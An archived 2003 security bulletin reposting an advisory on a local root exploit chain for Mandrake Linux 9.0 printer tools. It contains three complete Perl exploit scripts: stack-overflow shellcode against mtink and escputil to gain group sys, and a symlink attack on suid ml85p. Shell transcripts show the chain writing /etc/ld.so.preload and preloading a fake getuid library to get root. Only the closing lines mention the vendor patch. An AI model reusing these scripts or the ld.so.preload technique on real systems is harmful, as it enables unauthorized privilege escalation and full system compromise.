28th Feb 2003 [SBWID-6030]
COMMAND
	ml85p local root exploit
SYSTEMS AFFECTED
	Mandrake 9
PROBLEM
	In Priv8 Security advisory :
	
	 http://www.priv8security.com
	
	Credits to iDefense [http://www.idefense.com/advisory/01.21.03.txt]
	Ok, our goal is to get root by  exploiting  ml85p  thats  suid  root  by
	default on mdk 9.0
	
	[wsxz@localhost priv8]$ ls -l /usr/bin/ml85p
	-rwsr-x---    1 root     sys         12344 Set 17 16:40
	/usr/bin/ml85p*
	
	You can see that we gona need group sys to run it so first lets get it.
	 
	[wsxz@localhost priv8]$ ls -l /usr/bin/mtink
	-rwxr-sr-x    1 lp       sys        132600 Set 17 16:40
	/usr/bin/mtink*
	[wsxz@localhost priv8]$ ls -l /usr/bin/escputil
	-rwxr-sr-x    1 lp       sys         32088 Set 17 16:40
	/usr/bin/escputil*
	
	We have two here that are vuln, mtink has a stack overflow on  env  HOME
	and escputil has a stack over too on command line arg, for more  details
	read idefense adv.
	So here we go.... First we get gid sys by exploiting mtink or  escputil,
	u can choose what one u want to.
	
	[wsxz@localhost priv8]$ id
	uid=503(wsxz) gid=503(wsxz) grupos=503(wsxz)
	[wsxz@localhost priv8]$ perl priv8mtink.pl
	 Priv8security.com Mandrake 9 mtink local sys exploit!!
	 usage: priv8mtink.pl offset
	 Using address: 0xbffffa80
	sh-2.05b$ id
	uid=503(wsxz) gid=3(sys) groups=503(wsxz)
	
	And now we can exploit ml85p
	 1 - Writing any file on system!!!
	
	sh-2.05b$ perl priv8ml85p.pl /root/hi-there-Mr-root
	
	Let write some files ok ;p Now just press enter ;) Wrong file format.
	
	file position: ffffffff
	sh-2.05b$
	
	Now we check if it worked....
	
	[root@localhost root]# pwd
	/root
	[root@localhost root]# ls -l hi*
	-rw-rw-rw-    1 root     sys             0 Fev 24 03:32
	
	hi-there-Mr-root
	 2 - Geting root with it ;)
	I will do the same thing on idefense adv, so lets do it..
	
	sh-2.05b$ id
	uid=503(wsxz) gid=3(sys) groups=503(wsxz)
	sh-2.05b$ perl priv8ml85p.pl /etc/ld.so.preload
	Let write some files ok ;p
	Now just press enter ;)
	Wrong file format.
	file position: ffffffff
	sh-2.05b$ ls -l /etc/ld.so.preload
	-rw-rw-rw-    1 root     sys             0 Feb 26 00:12
	/etc/ld.so.preload
	sh-2.05b$ cd /tmp
	sh-2.05b$ echo 'int getuid(void) { return 0; }' > lib.c
	sh-2.05b$ export PATH="/usr/bin:/usr/sbin:/sbin:/bin"
	sh-2.05b$ gcc -fPIC -c /tmp/lib.c
	sh-2.05b$ gcc -o /tmp/lib.so -shared /tmp/lib.o
	sh-2.05b$ echo "/tmp/lib.so" > /etc/ld.so.preload
	sh-2.05b$ su -
	[root@localhost root]# id
	uid=0(root) gid=0(root) grupos=0(root)
	
	It worked, so take care what u ll write ok ;) that's it.
	
	------------------------------------------------------------------------------------------------------------------
	priv8escputil.pl
	------------------------------------------------------------------------------------------------------------------
	#!/usr/bin/perl
	######################################################
	#Priv8security.com escputil local sys exploit.
	#
	#     Tested on Mandrake 9.0 only.
	#     Based on
	http://www.idefense.com/advisory/01.21.03.txt
	#
	#####################################################
	                    $shellcode =
			    "\x31\xc0\xb0". #setregid(x,x) - where x = x03 sys gid
			    "\x03".    # x = x03 sys gid
			    "\x89\xc3\x89\xc1\xb0\x47\xcd\x80".#end setregid()
	"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
	"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
			    $size = 1050;
	                    $retaddr = 0xbffff4e0;
	                    $nop = "\x90";
	                    $offset = 0;
	                    if (@ARGV == 1) {
	                    $offset = $ARGV[0];
	                    }
			    print " Priv8security.com Mandrake 9 escputil local
	sys exploit!!\n";
			    print " usage: $0 offset\n";
			    for ($i = 0; $i < ($size - length($shellcode) - 4);
	$i++) {
	                    $buffer .= $nop;
	                    }
	                    $buffer .= $shellcode;
	                    print " Using address: 0x",
	sprintf('%lx',($retaddr + $offset)), "\n";
	                    $newret = pack('l', ($retaddr +
	$offset));
	                    for ($i += length($shellcode); $i <
	$size; $i += 4) {
	                    $buffer .= $newret;
	                    }
	                    exec("/usr/bin/escputil -c -P
	$buffer");
	------------------------------------------------------------------------------------------------------------------
	priv8ml85p.pl
	------------------------------------------------------------------------------------------------------------------
	#!/usr/bin/perl
	######################################################
	#Priv8security.com ml85p local root exploit.
	#
	#      This exploit erase any file on system, u ll need
	group sys to do it
	#      so run priv8mtink.pl or priv8escputil.pl to get
	it ;)
	#     Tested on Mandrake 9.0 only.
	#     Based on
	http://www.idefense.com/advisory/01.21.03.txt
	#
	#####################################################
	              if (@ARGV == 1) {
		      $file = $ARGV[0];
		      $b = "/tmp/ml85g";
	              $b .= time();
	              exec(umask 000);
		      system("ln -s $file '$b'");
	              print "Lets write some files ok ;p\n";
		      print "Now just press enter....\n";
	                 if  (system("/usr/bin/ml85p -s") == -1){
	                      print "You cant run ml85p, check
	if u have gid sys...\n";
			     }
		      exit(1);
		     } else {
	             print "\n!!! Priv8security.com ml85p local
	root exploit by wsxz !!!\n";
	             print "    Usage: perl $0
	file-to-overwrite\n\n";
	             }
	------------------------------------------------------------------------------------------------------------------
	------------------------------------------------------------------------------------------------------------------
	priv8mtink.pl
	------------------------------------------------------------------------------------------------------------------
	#!/usr/bin/perl
	######################################################
	#Priv8security.com mtink local sys exploit.
	#
	#     Tested on Mandrake 9.0 only.
	#     Based on
	http://www.idefense.com/advisory/01.21.03.txt
	#
	#####################################################
	                    $shellcode2 =
			    "\x31\xc0\xb0". #setregid(x,x) - where x = x03 sys gid
			    "\x03".    # x = x03 sys gid
			    "\x89\xc3\x89\xc1\xb0\x47\xcd\x80".#end setregid()
	"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
	"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
			    $size = 1056;
			    $retaddr = 0xbffffa80;
	                    $nop = "\x90";
	                    $offset = 0;
	                    if (@ARGV == 1) {
	                    $offset = $ARGV[0];
	                    }    
			    print " Priv8security.com Mandrake 9 mtink local sys
	exploit!!\n";
			    print " usage: $0 offset\n";
	                    for ($i = 0; $i < ($size -
	length($shellcode2) - 4); $i++) {
	                    $buffer .= $nop;
	                    }
	                    $buffer .= $shellcode2;
	                    print " Using address: 0x",
	sprintf('%lx',($retaddr + $offset)), "\n";
	                    $newret = pack('l', ($retaddr +
	$offset));
	                    for ($i += length($shellcode2); $i
	< $size; $i += 4) {
	                    $buffer .= $newret;
	                    }
	                    local($ENV{'HOME'}) = $buffer;
	exec("/usr/bin/mtink");
	------------------------------------------------------------------------------------------------------------------
	
SOLUTION
	A patch written by Till Kamppeter was  applied  to  ml85p  to  fix  that
	vulnerability. Updates are provided for Mandrake Linux 8.1  through  9.0
	for the printer-drivers packages, and ghostscript in 8.0  to  fix  these
	vulnerabilities (MDKSA-2003:010).